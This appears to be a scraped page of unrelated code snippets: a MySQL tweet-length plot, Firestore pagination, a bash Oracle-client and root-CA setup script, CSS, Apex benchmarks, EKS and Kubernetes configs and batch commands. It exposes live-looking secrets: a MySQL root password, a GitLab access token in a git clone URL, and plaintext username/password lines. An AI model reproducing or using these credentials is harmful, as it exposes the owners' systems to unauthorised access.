Snippets Collections
import mysql.connector
import pandas as pd
import matplotlib.pyplot as plt

# Connect to the local MySQL instance that holds the tweet archive.
# NOTE(review): credentials are hard-coded — move them to environment
# variables or a config file before sharing this script, and rotate the
# password.
mydb = mysql.connector.connect(
    host="localhost",
    user="root",
    password="Eimaipolykala1",
    database="twitter_db"
)

try:
    # Create cursor and pull one value per row:
    # display_text_range[1] is the exclusive end offset of the tweet text,
    # i.e. its length in characters.
    cursor = mydb.cursor()
    cursor.execute(
        "SELECT JSON_VALUE(data, '$.extended_tweet.display_text_range[1]') "
        "AS text_length FROM data_db"
    )
    data = cursor.fetchall()
    cursor.close()
finally:
    # Always release the connection, even if the query fails
    # (the original leaked it on any exception).
    mydb.close()

# One column of values straight from MySQL (strings or NULL).
df = pd.DataFrame(data, columns=['Text_Length'])

# JSON_VALUE returns strings/NULLs; coerce to numbers and drop rows whose
# tweet had no extended_tweet payload.
df['Text_Length'] = pd.to_numeric(df['Text_Length'], errors='coerce')
df = df.dropna()

# Box plot of the distribution of extended-tweet text lengths.
plt.figure(figsize=(10, 6))
plt.boxplot(df['Text_Length'])
plt.xlabel('Text Length')
plt.ylabel('Number of Characters')
plt.title('Distribution of Text Length in Extended Tweets')
plt.show()
// Regular implementation (React Native Firebase SDK, @react-native-firebase/firestore)
import React, { useState, useEffect } from 'react';
import { View, FlatList, ListItem, Button, Avatar } from 'react-native';
import firestore from '@react-native-firebase/firestore';

// Assuming filteredData is your initial data source
const YourComponent = () => {
  const [visibleData, setVisibleData] = useState([]);
  const [isLoading, setIsLoading] = useState(false);
  const [lastVisible, setLastVisible] = useState(null);

  useEffect(() => {
    fetchData();
  }, []);

  const fetchData = async () => {
    setIsLoading(true);
    try {
      const querySnapshot = await firestore()
        .collection('your_collection')
        .orderBy('createdAt', 'desc')
        .limit(10)
        .get();

      const newData = querySnapshot.docs.map((doc) => ({
        id: doc.id,
        ...doc.data(),
      }));
      
      setVisibleData(newData);
      setLastVisible(querySnapshot.docs[querySnapshot.docs.length - 1]);
    } catch (error) {
      console.error('Error fetching data: ', error);
    } finally {
      setIsLoading(false);
    }
  };

  const fetchMoreData = async () => {
    setIsLoading(true);
    try {
      const querySnapshot = await firestore()
        .collection('your_collection')
        .orderBy('createdAt', 'desc')
        .startAfter(lastVisible)
        .limit(10)
        .get();

      const newData = querySnapshot.docs.map((doc) => ({
        id: doc.id,
        ...doc.data(),
      }));
      
      setVisibleData((prevData) => [...prevData, ...newData]);
      setLastVisible(querySnapshot.docs[querySnapshot.docs.length - 1]);
    } catch (error) {
      console.error('Error fetching more data: ', error);
    } finally {
      setIsLoading(false);
    }
  };

  const handleEndReached = () => {
    if (!isLoading) {
      fetchMoreData();
    }
  };

  return (
    <FlatList
      data={visibleData}
      keyExtractor={(item) => item.id}
      ListEmptyComponent={() =>
        isLoading ? <EventMenuProduct /> : <NoData />
      }
      onEndReached={handleEndReached}
      onEndReachedThreshold={0.1} // Adjust this threshold as needed
      renderItem={({ item, index }) => (
        <View
          key={index}
          style={{
            alignContent: 'center',
            alignSelf: 'center',
          }}
        >
          {/* Your existing renderItem logic */}
        </View>
      )}
    />
  );
};

export default YourComponent;


/// Modified version using the Firebase Web (modular) SDK
import React, { useState, useEffect } from 'react';
import { View, FlatList, ListItem, Button, Avatar } from 'react-native';
import { collection, getDocs, onSnapshot } from 'firebase/firestore';
import { db } from 'your-firebase-config-file'; // Import your Firebase database config

// Assuming filteredData is your initial data source
const YourComponent = ({ category }) => {
  const [products, setProducts] = useState([]);
  const [isLoading, setIsLoading] = useState(false);
  const [lastDoc, setLastDoc] = useState(null);

  useEffect(() => {
    fetchMenuData();
  }, []);

  const fetchMenuData = async () => {
    setIsLoading(true);
    try {
      const subCollectionNames = getCategorySubCollectionNames(category);

      const allProducts = [];

      const subCollectionPromises = subCollectionNames.map(async (subCollectionName) => {
        const subCollectionRef = collection(db, `vehicles/${category}/${subCollectionName}`);
        const subCollectionSnapshot = await getDocs(subCollectionRef);

        subCollectionSnapshot.forEach((doc) => {
          allProducts.push({ id: doc.id, ...doc.data() });
        });

        const unsubscribe = onSnapshot(subCollectionRef, (snapshot) => {
          snapshot.docChanges().forEach((change) => {
            if (change.type === 'added') {
              setProducts((prevProducts) => [...prevProducts, { id: change.doc.id, ...change.doc.data() }]);
            }
          });
        });

        return () => unsubscribe();
      });

      await Promise.all(subCollectionPromises);
      setIsLoading(false);
    } catch (error) {
      console.error('Error fetching menu data:', error);
      setIsLoading(false);
    }
  };

  const getCategorySubCollectionNames = (category) => {
    switch (category) {
      case 'Buying':
        return ['subCollectionName1', 'subCollectionName2']; // Adjust with your subcollection names
      case 'Renting':
        return ['subCollectionName3', 'subCollectionName4']; // Adjust with your subcollection names
      default:
        return [];
    }
  };

  const handleEndReached = () => {
    if (!isLoading) {
      fetchMoreData();
    }
  };

  const fetchMoreData = async () => {
    setIsLoading(true);
    try {
      const subCollectionNames = getCategorySubCollectionNames(category);

      const allProducts = [];

      const subCollectionPromises = subCollectionNames.map(async (subCollectionName) => {
        const subCollectionRef = collection(db, `vehicles/${category}/${subCollectionName}`);

        const query = lastDoc ? subCollectionRef.startAfter(lastDoc) : subCollectionRef;

        const subCollectionSnapshot = await getDocs(query);

        subCollectionSnapshot.forEach((doc) => {
          allProducts.push({ id: doc.id, ...doc.data() });
        });

        const lastDocument = subCollectionSnapshot.docs[subCollectionSnapshot.docs.length - 1];
        setLastDoc(lastDocument);

        return allProducts;
      });

      const productsArray = await Promise.all(subCollectionPromises);
      const mergedProducts = productsArray.reduce((acc, curr) => acc.concat(curr), []);

      setProducts((prevProducts) => [...prevProducts, ...mergedProducts]);
      setIsLoading(false);
    } catch (error) {
      console.error('Error fetching more data:', error);
      setIsLoading(false);
    }
  };

  return (
    <FlatList
      data={products}
      keyExtractor={(item) => item.id}
      ListEmptyComponent={() => isLoading ? <EventMenuProduct /> : <NoData />}
      onEndReached={handleEndReached}
      onEndReachedThreshold={0.1}
      renderItem={({ item }) => (
        <View style={{ /* Your styling */ }}>
          {/* Your rendering logic */}
        </View>
      )}
    />
  );
};

export default YourComponent;

#Latest tnsnames.ora
# Source of the current tnsnames.ora (the bare URL below is a reference,
# not a runnable command):
https://tns2web.dev.oci.bonprix.de/tnsnames.ora

# Download the latest tnsnames.ora and install it where TNS_ADMIN points.
wget https://tns2web.dev.oci.bonprix.de/tnsnames.ora
sudo cp -v tnsnames.ora /etc/oracle/
// NOTE(review): this snippet is a byte-for-byte duplicate of the "Regular"
// react-native-firebase pagination snippet earlier in this collection —
// consider keeping only one copy.
import React, { useState, useEffect } from 'react';
// NOTE(review): react-native exports no ListItem/Avatar, and ListItem,
// Button and Avatar are unused here.
import { View, FlatList, ListItem, Button, Avatar } from 'react-native';
import firestore from '@react-native-firebase/firestore';

// Assuming filteredData is your initial data source
// Infinite-scroll list: first page via fetchData, next pages via fetchMoreData.
const YourComponent = () => {
  const [visibleData, setVisibleData] = useState([]);
  const [isLoading, setIsLoading] = useState(false);
  // Pagination cursor (last doc of the previous page); null before 1st page.
  const [lastVisible, setLastVisible] = useState(null);

  useEffect(() => {
    fetchData();
  }, []);

  // Load the first page of 10 documents, newest first.
  const fetchData = async () => {
    setIsLoading(true);
    try {
      const querySnapshot = await firestore()
        .collection('your_collection')
        .orderBy('createdAt', 'desc')
        .limit(10)
        .get();

      const newData = querySnapshot.docs.map((doc) => ({
        id: doc.id,
        ...doc.data(),
      }));
      
      setVisibleData(newData);
      // NOTE(review): on an empty collection this stores undefined, and
      // fetchMoreData then calls startAfter(undefined) — guard before use.
      setLastVisible(querySnapshot.docs[querySnapshot.docs.length - 1]);
    } catch (error) {
      console.error('Error fetching data: ', error);
    } finally {
      setIsLoading(false);
    }
  };

  // Append the page after the current cursor.
  const fetchMoreData = async () => {
    setIsLoading(true);
    try {
      const querySnapshot = await firestore()
        .collection('your_collection')
        .orderBy('createdAt', 'desc')
        .startAfter(lastVisible)
        .limit(10)
        .get();

      const newData = querySnapshot.docs.map((doc) => ({
        id: doc.id,
        ...doc.data(),
      }));
      
      setVisibleData((prevData) => [...prevData, ...newData]);
      setLastVisible(querySnapshot.docs[querySnapshot.docs.length - 1]);
    } catch (error) {
      console.error('Error fetching more data: ', error);
    } finally {
      setIsLoading(false);
    }
  };

  // Guard: avoid overlapping page fetches while one is in flight.
  const handleEndReached = () => {
    if (!isLoading) {
      fetchMoreData();
    }
  };

  return (
    <FlatList
      data={visibleData}
      keyExtractor={(item) => item.id}
      // EventMenuProduct / NoData presumably defined elsewhere — TODO confirm.
      ListEmptyComponent={() =>
        isLoading ? <EventMenuProduct /> : <NoData />
      }
      onEndReached={handleEndReached}
      onEndReachedThreshold={0.1} // Adjust this threshold as needed
      renderItem={({ item, index }) => (
        <View
          key={index}
          style={{
            alignContent: 'center',
            alignSelf: 'center',
          }}
        >
          {/* Your existing renderItem logic */}
        </View>
      )}
    />
  );
};

export default YourComponent;
#COMPLETE
#!/bin/bash

# One-time workstation setup:
#  1) Install the bonprix root CA and point Python/requests at the system
#     CA bundle (guarded by a marker line in ~/.bashrc).
#  2) Install the Oracle Instant Client plus its environment variables
#     (guarded by the /opt/oracle/instantclient path check), then reboot.
# NOTE(review): `source ~/.bashrc` in a non-interactive script only affects
# this shell, not the user's future sessions' already-open terminals.
if ! grep -q 'REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt' ~/.bashrc; then \
	wget http://pki.bonprix.de/aia/bpRootCA01.crt; \
	openssl x509 -inform der -outform pem -in bpRootCA01.crt -out bpRootCA01-pem.crt; \
	sudo cp bpRootCA01-pem.crt /usr/local/share/ca-certificates/bpRootCA01.crt; \
	sudo update-ca-certificates --fresh; \
	if [ -x "$(command -v python)" ]; then
		python -m pip config set global.cert /etc/ssl/certs/ca-certificates.crt; \
	fi;
	echo 'export REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt' >> ~/.bashrc; \
	source ~/.bashrc; \
	export REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt; \
fi;
# Oracle Instant Client installation — runs once, then reboots the machine.
# SECURITY(review): the git clone below embeds a plaintext GitLab access
# token — rotate it and switch to a credential helper or deploy key.
if [ ! -L /opt/oracle/instantclient ]; then \
	sudo rm -f /etc/profile.d/bp_envs.sh; \
	echo 'export ORACLE_HOME="/opt/oracle/instantclient"' | sudo tee /etc/profile.d/bp_envs.sh; \
	echo 'export TNS_ADMIN="/etc/oracle"' | sudo tee -a /etc/profile.d/bp_envs.sh; \
	echo 'export DYLD_LIBRARY_PATH="/opt/oracle/instantclient"' | sudo tee -a /etc/profile.d/bp_envs.sh; \
	echo 'export LD_LIBRARY_PATH="/opt/oracle/instantclient"' | sudo tee -a /etc/profile.d/bp_envs.sh; \
	echo 'export SQLPATH="/opt/oracle/instantclient"' | sudo tee -a /etc/profile.d/bp_envs.sh; \
	echo 'export PATH=$PATH:"/opt/oracle/instantclient"' | sudo tee -a /etc/profile.d/bp_envs.sh; \
	sh /etc/profile.d/bp_envs.sh; \
	sudo apt-get update && sudo apt-get install -q -y libaio1 gcc libc-dev; \
	cd /opt; \
	sudo curl -o oracle.tgz https://digistyle.bonprix.net/artifactory/docker-external/oracle/instantclient/19.3.0.0.0/instantclient-19.3.0.0.0.tar.gz; \
	sudo tar -xf oracle.tgz; \
	sudo rm -f oracle.tgz; \
	cd; \
	if [ ! -x "$(command -v git)" ]; then
		sudo apt-get update && sudo apt-get install git -y -q; \
	fi;
 	git clone https://ai-squad-fetch-token:glpat-H8y665Wgn9vhYuRE-eMG@gitlab-es.bonprix.work/em-ps-admin/tnsnames; \
	sudo mkdir -p /etc/oracle; \
	sudo mv tnsnames/tnsnames.ora /etc/oracle/; \
	sudo rm -r tnsnames; \
	sudo reboot; \
fi;
// Pin assignments (were magic numbers scattered through the code).
const int LED_PIN = 13;    // output: on-board LED
const int SENSOR_PIN = 3;  // input: active-low switch/sensor

void setup() {
  // Runs once at boot: configure pins and the serial console.
  pinMode(LED_PIN, OUTPUT);
  // Plain INPUT — an external pull resistor is assumed; otherwise use
  // INPUT_PULLUP. TODO confirm the wiring.
  pinMode(SENSOR_PIN, INPUT);
  Serial.begin(9600);
}

void loop() {
  // Mirror the active-low input onto the LED: LOW in -> LED on.
  if (digitalRead(SENSOR_PIN) == LOW) {
    digitalWrite(LED_PIN, HIGH);
  } else {
    digitalWrite(LED_PIN, LOW);
  }
  // Both branches delayed identically in the original — hoisted here.
  delay(10);
}
// Global safety net: stop uncaught exceptions thrown by the application
// under test from failing the Cypress spec.
// NOTE(review): returning false for *every* error can hide real app bugs —
// consider filtering on err.message for the specific known exception.
Cypress.on('uncaught:exception', (err, runnable) => {
    // returning false here prevents Cypress from
    // failing the test
    return false
})
/* Base: prevent horizontal scroll and set the site font.
   (Fixed: `!Important` normalized to the conventional lowercase
   `!important` throughout — CSS is case-insensitive here, but the mixed
   casing was inconsistent; one commented-out dead rule removed.) */
html, body{
	width:100%;
	overflow-x:hidden;
	font-family: "Montserrat", Sans-serif;
}
/* Hide embed chrome (footer + title). */
.embed-footer{
	display:none !important;
}
.embed-container .embed-header .embed-title {
	display:none !important;
}
.entry-content p {
    margin-bottom: 15px !important;
}
/* Center the logo/branding in header layout 2. */
.header-main-layout-2 .site-branding {
    text-align: center;
    padding-bottom:0 !important;
}
.ast-site-identity {
    padding: 1em 0 0 0 !important;
}
/* Mobile header adjustments. */
@media(max-width:767px){
	.ast-site-identity {
    padding: 0 !important;
}
	.ast-mobile-menu-buttons{
		position:relative;
		top:8px;
		right: -10px;
	}
	.ast-header-break-point .ast-above-header-mobile-inline .above-header-2 .ast-above-header-section-1, .ast-header-break-point .ast-above-header-mobile-stack .above-header-2 .ast-above-header-section-1 {
    padding: 0 0 0 0 !important;
}
	.ast-above-header {
    padding-top: 0 !important;
}
	.above-header-user-select .ast-custom-html{
		line-height:30px;
	}
}
.ast-logo-title-inline .site-logo-img {
    padding-right: 0 !important;
}
/* Remove focus outlines on links. */
a{
	outline:0 !important;
}
a:hover, a:focus{
	outline:0 !important;
}
/* GDPR cookie banner link color. */
.ct-ultimate-gdpr-cookie-content a{
	color:#000000 !important;
}
/* MemberPress wrapper: hidden by default, shown inside Elementor pages. */
.mp_wrapper{
display:none;
}
.ele-mp .mp_wrapper{
	display:block;
}

/** Start Block Kit CSS: 72-3-34d2cc762876498c8f6be5405a48e6e2 **/

.envato-block__preview{overflow: visible;}

/*Kit 69 Custom Styling for buttons */
.envato-kit-69-slide-btn .elementor-button,
.envato-kit-69-cta-btn .elementor-button,
.envato-kit-69-flip-btn .elementor-button{
	border-left: 0px !important;
	border-bottom: 0px !important;
	border-right: 0px !important;
	padding: 15px 0 0 !important;
}
.envato-kit-69-slide-btn .elementor-slide-button:hover,
.envato-kit-69-cta-btn .elementor-button:hover,
.envato-kit-69-flip-btn .elementor-button:hover{
	margin-bottom: 20px;
}
/* Lift the main-menu link slightly and underline it on hover. */
.envato-kit-69-menu .elementor-nav-menu--main a:hover{
	margin-top: -7px;
	padding-top: 4px;
	border-bottom: 1px solid #FFF;
}
/* Fix menu dropdown width */
.envato-kit-69-menu .elementor-nav-menu--dropdown{
	width: 100% !important;
}

/** End Block Kit CSS: 72-3-34d2cc762876498c8f6be5405a48e6e2 **/

/* Contact Page -> Form Submit Button */
/* Pink-to-red gradient shared by both page-specific submit buttons. */
.elementor-27075 .elementor-element.elementor-element-90f53f5 .elementor-button[type="submit"]{
    background: transparent linear-gradient(90deg, #ec028b, #f9423a) 0 0 no-repeat padding-box;
}

.elementor-2036 .elementor-element.elementor-element-8454f52 .elementor-button[type="submit"] {
	    background: transparent linear-gradient(90deg, #ec028b, #f9423a) 0 0 no-repeat padding-box;
}

/* FAQ section */
/* Card-style FAQ toggles; the border color animates to teal on hover (see
   the :hover rule that follows this block).
   Fixed: in the original `transition: border, color, outline, box-shadow,
   border-color .15s ease-in-out;` only the *last* entry carried the .15s
   duration — the rest were inert 0s transitions — so only border-color ever
   animated. The shorthand now says exactly that. Dead commented-out
   declarations removed. */
.elementor-toggle-item {
    border-radius: .35rem;
	border: 2px solid #f6f7f7;
	transition: border-color .15s ease-in-out;
	will-change: border-color;
}

/* FAQ answer links. */
.elementor-toggle-item > div > p > a {
    font-family: Montserrat, sans-serif !important;
	font-size: 15px;
	color: #f35a21;
	
    font-weight: 600 !important;

}

.elementor-toggle-item:hover {
	border: 2px solid #00aeaa;
}

/* Teal focus ring on all text-like inputs (incl. Elementor fields). */
input[type="password"]:focus,input[type="text"]:focus,input[type="email"]:focus,
input[type="tel"]:focus,input[type="textarea"]:focus, .elementor-field-textual:focus{
    border: 2px solid #00aeaa !important;
}


.mp_wrapper input[type="password"]:focus {
	 border: 2px solid #00aeaa !important;
}



/* MemberPress form labels. */
.mp-form-label{
	font-family: "Montserrat", Sans-serif;
    font-size: 14px;
    font-weight: 600;
    line-height: 1.4em;
}

.mp-form-label label {
	line-height: 1.4em !important;
}

/* MemberPress text inputs: white, rounded, Montserrat. */
.mp_wrapper input[type="text"], .mp_wrapper input[type="url"], .mp_wrapper input[type="email"], .mp_wrapper input[type="tel"], .mp_wrapper input[type="number"], .mp_wrapper input[type="password"]{
background-color: #FFFFFF;
    border-color: var(--e-global-color-844b050);
    border-width: 2px 2px 2px 2px;
    border-radius: .35rem .35rem .35rem .35rem;
	font-family: "Montserrat", Sans-serif;
    font-size: 15px;
    font-weight: 500;
	color:#000000;
}

/* Gradient submit buttons for the global Elementor kit. */
.elementor-kit-37 input[type="submit"] {
	background: transparent linear-gradient(90deg, #ec028b, #f9423a) 0 0 no-repeat padding-box;
	font-family: "Montserrat", Sans-serif;
    font-size: 14px;
    font-weight: 700;
    text-transform: uppercase;
    letter-spacing: 1px;
    border-style: none;
    padding: 1.2rem 4rem 1.2rem 4rem;
	border-radius: 2px;
}

.mepr-login-actions a {
	font-size: 14px;
}


.elementor-page-1757 {
	font-family: "Montserrat", Sans-serif;
}

/* Stripe card element styled to match the other MemberPress inputs. */
.mepr-stripe-card-element, .mp_wrapper .mepr-payment-method .spc input {
	background-color: #FFFFFF;
    border-color: #F0F0F0 !important;
    border-width: 2px 2px 2px 2px !important;
    border-radius: .35rem .35rem .35rem .35rem;
	font-family: "Montserrat", Sans-serif;
    font-size: 15px;
    font-weight: 500;
	color:#000000;
	line-height: 1.8rem ;
}
/**
 * WordPress [year] shortcode — outputs the current four-digit year.
 */
function year_shortcode() {
    return date('Y');
}
add_shortcode('year', 'year_shortcode');
/**
 * Return every `len`-element combination of `arr`, preserving element order.
 *
 * Fixes the original algorithm, which only emitted combinations whose first
 * two members were consecutive in `arr` (for [1..5] choose 3 it produced 6
 * of the 10 combinations — [1,3,5], [1,3,4], [1,4,5] and [2,4,5] were never
 * generated). Debug console.log calls removed.
 *
 * @param {Array}  arr - source elements
 * @param {number} len - combination size
 * @returns {Array<Array>} all combinations in lexicographic index order
 */
function combinations(arr, len) {
    const result = [];
    const current = [];

    // Depth-first backtracking over start indexes.
    const backtrack = (start) => {
        if (current.length === len) {
            result.push([...current]);
            return;
        }
        // Stop early once the remaining elements can't fill the combination.
        for (let i = start; i <= arr.length - (len - current.length); i++) {
            current.push(arr[i]);
            backtrack(i + 1);
            current.pop();
        }
    };

    if (len >= 0 && len <= arr.length) backtrack(0);
    return result;
}
combinations([1, 2, 3, 4, 5], 3)
/**
 * Flatten `array` in place to a single level, at any nesting depth.
 * Mutates the argument; returns nothing (matching the original contract).
 */
function flatten(array) {
  // Walk backwards so splicing expanded elements never disturbs the
  // indexes still to be visited.
  for (let i = array.length - 1; i >= 0; i--) {
    const item = array[i];
    if (Array.isArray(item)) {
      flatten(item);                 // make the nested array one level deep
      array.splice(i, 1, ...item);   // then inline its elements
    }
  }
}


var array = [['1', '2', '3'], ['4', '5', ['6'], ['7', '8']]];

flatten(array);

console.log(array);
/**
 * This is a test to see how much CPU time it takes to generate
 * 100k Cell object instances in a referenceable way and find the most efficient 
 * way to do so.
 * Also calculate how long it takes to then reference each Object instance based
 * on the object x,y,z indexes.
 * Note: the generation of 100 records and adding to the map takes about 240ms
 *       so that needs to be deducted from the instantiation, but is still part
 *       of the calculation required for the solution
 */
// Test Settings
Integer numberOfSheets  = 10;   // wsi
Integer numberOfRows    = 100;  // ri
Integer numberOfColumns = 100;  // ci

// Multidimensional array for storing the cells: [sheet][row][column]
Cell[][][] cells = new Cell[][][]{};

// Register start time
Decimal st = Limits.getCpuTime();

// Build the nested sheet -> row -> column lists and populate each cell.
for(Integer wsi=0; wsi < numberOfSheets; wsi++){

    // Add a row/column array for each worksheet
    cells.add(new Cell[][]{});

    // Iterate the number of rows
    for(Integer ri=0; ri < numberOfRows; ri++){

        // Add a column array for each row
        cells[wsi].add(new Cell[]{});

        // Add Cells to the row
        for(Integer ci = 0; ci < numberOfColumns; ci++){
            cells[wsi][ri].add(new Cell(wsi,ri,ci));
        }
    }
}

// Register end time
Decimal et = Limits.getCpuTime();

// Reference every cell once by its (sheet, row, column) indexes.
for(Integer wsi = 0; wsi < numberOfSheets; wsi++){
    for(Integer ri=0; ri < numberOfRows; ri++){
        for(Integer ci = 0; ci < numberOfColumns; ci++){
            getCell(wsi, ri, ci);
        }
    }
}

// Register final end time
Decimal fet = Limits.getCpuTime();

// Output metrics
System.debug('Generation Time: ' + (et-st)  + ' (' + (numberOfSheets * numberOfRows * numberOfColumns) + ' cells)');
System.debug('Reference  Time: ' + (fet-et) + ' (' + (numberOfSheets * numberOfRows * numberOfColumns) + ' cells)');

/**
 * Method to reference a cell at a certain position.
 * Fixed: the parameters were declared (wsi, ci, ri) while every call site
 * passes (wsi, ri, ci); it only appeared to work because rows == columns in
 * this test. The declaration now matches both the call sites and the
 * storage layout.
 */
Cell getCell(Integer wsi, Integer ri, Integer ci){
    return cells[wsi][ri][ci];
}


/**
 * Basic class example of a cell: just records its own coordinates.
 */
class Cell{
    Integer wsi;
    Integer ri;
    Integer ci;

    Cell(Integer wsi, Integer ri, Integer ci){
        this.wsi = wsi;
        this.ri  = ri;
        this.ci  = ci;
    }
}
# NOTE(review): these commands are listed in reverse execution order —
# create the IAM policy first, then the IRSA service account, then install
# the controller. Replace every <placeholder> before running. Also, the
# characters after the backslash at the end of the next line look like
# trailing spaces, which would break the line continuation — delete them.
# Step 3) Install the AWS Load Balancer Controller via Helm, reusing the
# service account created below.
helm install aws-load-balancer-controller eks/aws-load-balancer-controller \            
  -n kube-system \
  --set clusterName=<your-cluster-name> \
  --set serviceAccount.create=false \
  --set serviceAccount.name=aws-load-balancer-controller \
  --set region=<region> \
  --set vpcId=<your-vpc-id>
# Step 2) Create the IRSA service account bound to the controller policy.
eksctl create iamserviceaccount \
  --cluster=<your-cluster-name> \
  --namespace=kube-system \
  --name=aws-load-balancer-controller \
  --role-name AmazonEKSLoadBalancerControllerRole \
  --attach-policy-arn=arn:aws:iam::<your-aws-account-id>:policy/AWSLoadBalancerControllerIAMPolicy \
  --approve
# Step 1) Create the IAM policy from the downloaded policy document.
aws iam create-policy \
    --policy-name AWSLoadBalancerControllerIAMPolicy \
    --policy-document file://iam_policy.json
# NOTE(review): duplicate of the command above — a second run fails with
# EntityAlreadyExists and can be removed.
aws iam create-policy \
    --policy-name AWSLoadBalancerControllerIAMPolicy \
    --policy-document file://iam_policy.json
/* "Read more" button on post cards.
   (Four padding longhands collapsed into the equivalent shorthand:
   10px top/bottom, 25px left/right.) */
.elementor-post__read-more {
    background: #993333;
    padding: 10px 25px;
}
/* Post thumbnail: horizontal breathing room only (top/bottom margins are
   deliberately left untouched, so no `margin` shorthand here). */
.elementor-post__thumbnail {
    margin-left: 20px;
    margin-right: 20px;
}
rupert
.Su04.Po03

email
Rt=05?Qp04

WARNING: the four lines above look like plaintext usernames/passwords.
Remove them from this snippet collection and rotate the credentials —
anything pasted here should be treated as compromised.
// Test Config
String strX = 'value';
Integer itr = 100000;

/**
 * METHOD 01 Simple String Concat
 * Heap Size 24, CPU Time 5803 (100k iterations)
 */
// Add values to the simpleConcatString string
Integer heapStart = limits.getHeapSize();
Integer cpuStart  = limits.getCpuTime();
basicConcatMethod('');
Integer cpuEnd  = limits.getCpuTime();
Integer heapEnd = limits.getHeapSize();


/**
 * METHOD 02 XML StreamWriter Concat Method Cheat 
 * Heap Size 24, CPU Time 721 (100k iterations)
 */
Integer heapCheatStart = limits.getHeapSize();
Integer cpuCheatStart  = limits.getCpuTime();
xmlCheatMethod(new XmlStreamWriter());
Integer cpuCheatEnd    = limits.getCpuTime();
Integer heapCheatEnd   = limits.getHeapSize();

// Let's run it again with an example usage and also validate the results are the same
Assert.areEqual(
	basicConcatMethod(''),
    xmlCheatMethod(new XmlStreamWriter())
);

// Add the debugs at the end as we have a huge debug log with 100k iterations
System.debug('');
System.debug('HEAP string concat: ' + (heapEnd      - heapStart      ));
System.debug('CPUT string concat: ' + (cpuEnd       - cpuStart       ));
System.debug('');
System.debug('HEAP XML Cheat:     ' + (heapCheatEnd - heapCheatStart ));
System.debug('CPUT XML Cheat:     ' + (cpuCheatEnd  - cpuCheatStart  ));
System.debug('');


/**
 * Put your concatenation logic in here
 * Appends strX to the input `itr` times with plain += concatenation.
 * NOTE(review): a static method in anonymous Apex referencing the
 * script-level variables itr/strX — confirm this compiles in your org;
 * if not, pass them in as parameters.
 */
static String basicConcatMethod(String input){
    for(Integer i =0; i<itr; i++){
        input+=strX;
    }
    return input;
}


/**
 * or here
 * Same output via XmlStreamWriter.writeCharacters.
 * NOTE(review): writeCharacters XML-escapes characters such as < and & —
 * the two methods only agree for text without XML special characters
 * (true for 'value').
 */
static String xmlCheatMethod(XmlStreamWriter xsw){
    for(Integer i =0; i<itr; i++){
        xsw.writeCharacters(strX);
    }
    return xsw.getXmlString();
}

---
# Namespace for the 2048 demo app.
apiVersion: v1
kind: Namespace
metadata:
  name: game-2048
---
# Deployment: 5 replicas of the public 2048 container, serving on port 80.
apiVersion: apps/v1
kind: Deployment
metadata:
  namespace: game-2048
  name: deployment-2048
spec:
  selector:
    matchLabels:
      app.kubernetes.io/name: app-2048
  replicas: 5
  template:
    metadata:
      labels:
        app.kubernetes.io/name: app-2048
    spec:
      containers:
      - image: public.ecr.aws/l6m2t8p7/docker-2048:latest
        imagePullPolicy: Always
        name: app-2048
        ports:
        - containerPort: 80
---
# Service in front of the pods. With target-type "ip" (see the Ingress
# annotation below) the ALB registers pod IPs directly.
apiVersion: v1
kind: Service
metadata:
  namespace: game-2048
  name: service-2048
spec:
  ports:
    - port: 80
      targetPort: 80
      protocol: TCP
  type: NodePort
  selector:
    app.kubernetes.io/name: app-2048
---
# Ingress handled by the AWS Load Balancer Controller: provisions an
# internet-facing ALB routing / to service-2048.
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  namespace: game-2048
  name: ingress-2048
  annotations:
    alb.ingress.kubernetes.io/scheme: internet-facing
    alb.ingress.kubernetes.io/target-type: ip
spec:
  ingressClassName: alb
  rules:
    - http:
        paths:
        - path: /
          pathType: Prefix
          backend:
            service:
              name: service-2048
              port:
                number: 80
# Fargate profile so pods in the game-2048 namespace run on Fargate.
eksctl create fargateprofile \
    --cluster demo-cluster \
    --region us-east-1 \
    --name alb-sample-app \
    --namespace game-2048
# Point the local kubeconfig/kubectl at the cluster.
aws eks update-kubeconfig --name demo-cluster  --region us-east-1
InitInsert — new implementation (AL / Business Central fragment, shown without its enclosing procedure):
            if "No." = '' then begin
                TestNoSeries();
                NoSeriesCode := GetNoSeriesCode();
#if not CLEAN24
                NoSeriesMgt.RaiseObsoleteOnBeforeInitSeries(NoSeriesCode, xRec."No. Series", "Posting Date", "No.", "No. Series", IsHandled);
                if not IsHandled then begin
#endif
                    "No. Series" := NoSeriesCode;
                    if NoSeries.AreRelated("No. Series", xRec."No. Series") then
                        "No. Series" := xRec."No. Series";
                    "No." := NoSeries.GetNextNo("No. Series", "Posting Date");
                    SalesHeader2.ReadIsolation(IsolationLevel::ReadUncommitted);
                    SalesHeader2.SetLoadFields("No.");
                    while SalesHeader2.Get("Document Type", "No.") do
                        "No." := NoSeries.GetNextNo("No. Series", "Posting Date");
#if not CLEAN24
                    NoSeriesMgt.RaiseObsoleteOnAfterInitSeries("No. Series", NoSeriesCode, "Posting Date", "No.");
                end;
#endif
OPTION 1 — include only the following in cypress.json:

"reporter": "cypress-multi-reporters",
"reporterOptions": {
  "configFile": "reporter-config.json"
}
Then create a new file called reporter-config.json and add the config for each reporter there:

{
  "reporterEnabled": "mochawesome, autoset-status-cypress-testrail-reporter",
  "mochawesomeReporterOptions": {
    "reportDir": "cypress/reports",
    "overwrite": false,
    "html": true,
    "json": false
  },
  "autosetStatusCypressTestrailReporterReporterOptions": {
    "host": "https://xxxxxx/",
    "username": "xxxxx",
    "password": "xxxx",
    "projectId": 1,
    "runId": 1234
  }
}
:: Export Monday.com defects data.
cd\
cd "G:\My Drive\_My_projects\_Snippets\export_monday_defects_data"
cls
python export_monday_defects_data.py
:: Re-indent a JSON file (input.json -> output.json, 4-space indent).
cd\
cd "G:\My Drive\_My_projects\_Snippets\indent_json"
cls
python indent_json4.py input.json output.json 4
:: Convert Markdown to DOCX with Pandoc (zenburn code highlighting).
cd\
cd "G:\My Drive\_My_projects\_Snippets\Convert md_to_docx (Pandoc)"
cls
pandoc --highlight-style=zenburn input.md -f markdown -t docx -s -o output.docx
